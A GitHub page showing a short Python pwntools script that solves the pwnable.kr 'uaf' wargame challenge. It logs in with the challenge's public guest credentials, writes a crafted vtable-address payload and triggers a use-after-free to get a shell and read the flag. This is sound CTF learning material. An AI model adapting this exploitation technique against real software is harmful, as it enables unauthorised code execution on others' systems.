-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
28 lines (24 loc) · 973 Bytes
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
"""
I understood the basic idea of Use After Free vulnerability.
But i dunno so much about heap and chunks and how to examine memory in cpp bin
So i just read the walkthrough to understand the exploitation.
https://n1ght-w0lf.github.io/binary%20exploitation/uaf/
There author provided nice sources to learn heap memory.
"""
from pwn import *
def exploit():
s = ssh(user='uaf', host='pwnable.kr', password='guest', port=2222)
# create payload for uaf
args = ['./uaf', '24', '/tmp/whats10/payload']
# execute the uaf
s.process("""mkdir /tmp/whats10/ && cd /tmp/whats10/ && python -c 'print "\\x68\\x15\\x40\\x00\\x00\\x00\\x00\\x00" + "\\x90" * 16' > payload""",shell=True)
p = s.process(executable='./uaf', argv=args)
# send appropriate commands sequence
p.sendline('3')
p.sendline('2')
p.sendline('2')
p.sendline('1')
# get flag from 'cat flag' command in shell
p.interactive()
if __name__=='__main__':
exploit()